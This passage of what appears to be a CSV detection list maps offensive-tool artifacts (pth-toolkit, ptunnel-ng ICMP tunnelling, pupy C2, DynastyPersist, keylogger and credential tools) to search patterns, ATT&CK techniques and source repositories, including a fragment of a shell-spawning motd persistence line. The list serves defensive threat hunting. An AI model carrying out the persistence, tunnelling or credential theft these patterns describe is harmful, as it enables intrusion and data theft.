straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*pth-wmic*",".{0,1000}pth\-wmic.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*PTHWMIExec*",".{0,1000}PTHWMIExec.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*pth-wmis*",".{0,1000}pth\-wmis.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*ptresearch/AttackDetection*",".{0,1000}ptresearch\/AttackDetection.{0,1000}","offensive_tool_keyword","POC","POC exploits - The Attack Detection Team searches for new vulnerabilities and 0-days. reproduces it and creates PoC exploits to understand how these security flaws work and how related attacks can be detected on the network layer. Additionally. we are interested in malware and hackers TTPs. so we develop Suricata rules for detecting all sorts of such activities.","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ptresearch/AttackDetection","1","1","N/A","N/A","10","1314","358","2022-08-31T09:26:21Z","2016-03-24T14:42:50Z" "*ptunnel-client.log*",".{0,1000}ptunnel\-client\.log.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-data-recv*",".{0,1000}ptunnel\-data\-recv.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-data-send*",".{0,1000}ptunnel\-data\-send.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-master*",".{0,1000}ptunnel\-master.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng *",".{0,1000}ptunnel\-ng\s.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng.conf*",".{0,1000}ptunnel\-ng\.conf.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng.git*",".{0,1000}ptunnel\-ng\.git.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng.service*",".{0,1000}ptunnel\-ng\.service.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng.te*",".{0,1000}ptunnel\-ng\.te.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng-x64.exe*",".{0,1000}ptunnel\-ng\-x64\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng-x64-dbg.exe*",".{0,1000}ptunnel\-ng\-x64\-dbg\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng-x86.exe*",".{0,1000}ptunnel\-ng\-x86\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng-x86-dbg.exe*",".{0,1000}ptunnel\-ng\-x86\-dbg\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-server.log*",".{0,1000}ptunnel\-server\.log.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*pty.spawn(""/bin/sh""* >> /etc/update-motd.d/00-header*",".{0,1000}pty\.spawn\(\""\/bin\/sh\"".{0,1000}\s\>\>\s\/etc\/update\-motd\.d\/00\-header.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*public class Keylogger*",".{0,1000}public\sclass\sKeylogger.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*public class NTLMInjector*",".{0,1000}public\sclass\sNTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*Public\dcinst.exe*",".{0,1000}Public\\dcinst\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*PublicKeyToken=8337224c9ad9e356*",".{0,1000}PublicKeyToken\=8337224c9ad9e356.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*pupy*/checkvm.py*",".{0,1000}pupy.{0,1000}\/checkvm\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*pupy/payload_*",".{0,1000}pupy\/payload_.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyCmdLoop*",".{0,1000}PupyCmdLoop.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyCredentials.py*",".{0,1000}PupyCredentials\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyDnsCnc.py*",".{0,1000}PupyDnsCnc\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyDnsCommandServerHandler*",".{0,1000}PupyDnsCommandServerHandler.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*pupygen.py *",".{0,1000}pupygen\.py\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyKCPSocketStream*",".{0,1000}PupyKCPSocketStream.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyLoaderTemplate.*",".{0,1000}PupyLoaderTemplate\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyOffloadDNS*",".{0,1000}PupyOffloadDNS.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyOffloadSocket*",".{0,1000}PupyOffloadSocket.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupySocketStream.py*",".{0,1000}PupySocketStream\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyVirtualStream.py*",".{0,1000}PupyVirtualStream\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*pureqh/bypassAV*",".{0,1000}pureqh\/bypassAV.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pureqh/bypassAV","1","1","N/A","10","10","444","100","2021-05-18T05:03:03Z","2021-02-25T05:26:11Z" "*purevpn_cred_collector.*",".{0,1000}purevpn_cred_collector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*purplepanda.py*",".{0,1000}purplepanda\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*purplepanda_config.py*",".{0,1000}purplepanda_config\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*purplepanda_github.py*",".{0,1000}purplepanda_github\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*PURPLEPANDA_NEO4J_URL=*",".{0,1000}PURPLEPANDA_NEO4J_URL\=.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*purplepanda_prints.py*",".{0,1000}purplepanda_prints\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*PURPLEPANDA_PWD=*",".{0,1000}PURPLEPANDA_PWD\=.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*PurpleSharp.exe*",".{0,1000}PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*putterpanda_whoami*",".{0,1000}putterpanda_whoami.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*puttygen.exe FUZZ*",".{0,1000}puttygen\.exe\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*puzzlepeaches/NTLMRecon*",".{0,1000}puzzlepeaches\/NTLMRecon.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*PWCrack*",".{0,1000}PWCrack.{0,1000}","offensive_tool_keyword","PWCrack","cracking tool for multiple hash type","T1110 - T1111 - T1210 - T1558.002 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","5","486","60","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z" 